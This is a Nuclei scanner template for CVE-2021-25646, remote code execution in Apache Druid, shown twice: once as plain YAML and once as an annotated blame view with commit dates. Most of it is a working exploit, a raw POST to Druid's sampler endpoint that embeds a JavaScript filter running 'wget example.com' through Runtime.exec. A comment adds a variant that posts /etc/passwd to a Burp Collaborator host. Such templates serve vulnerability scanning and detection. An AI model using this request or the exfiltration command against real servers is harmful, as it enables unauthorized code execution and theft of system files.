nuclei-templates/cves/2021/CVE-2021-25646.yaml

id: CVE-2021-25646

info:
  name: Apache Druid RCE
  author: pikpikcu
  severity: critical
  reference: https://paper.seebug.org/1476/
  description: |
      Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
      Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.

requests:
  - raw:
      - |
        POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Content-Type: application/json
        Content-Length: 1006
        Connection: close

        {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
                                                "function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}",
                                                "dimension": "added",
                                                "": {
                                                        "enabled": "true"
                                                }
                                        }
                                }
          },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}

    # To read system Files, replace (wget example.com) with below payload
    # wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "application/json"
        part: header
        condtion: and
      - type: regex
        regex:
          - "numRowsRead"
          - "numRowsIndexed"
        part: body
        condtion: and
CVE-2021-25646 2021-02-03 09:24:49 +00:00			`id: CVE-2021-25646`

			`info:`
			`name: Apache Druid RCE`
			`author: pikpikcu`
			`severity: critical`
			`reference: https://paper.seebug.org/1476/`
			`description: \|`
			`Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.`
			`Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.`

			`requests:`
			`- raw:`
			`- \|`
			`POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0`
			`Content-Type: application/json`
			`Content-Length: 1006`
			`Connection: close`

			`{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",`
			`"function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}",`
			`"dimension": "added",`
			`"": {`
			`"enabled": "true"`
			`}`
			`}`
			`}`
			`},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}`

Update CVE-2021-25646.yaml 2021-02-03 16:12:03 +00:00			`# To read system Files, replace (wget example.com) with below payload`
			`# wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net`

CVE-2021-25646 2021-02-03 09:24:49 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- "application/json"`
			`part: header`
			`condtion: and`
			`- type: regex`
			`regex:`
			`- "numRowsRead"`
Update CVE-2021-25646.yaml 2021-02-03 16:12:03 +00:00			`- "numRowsIndexed"`
CVE-2021-25646 2021-02-03 09:24:49 +00:00			`part: body`
			`condtion: and`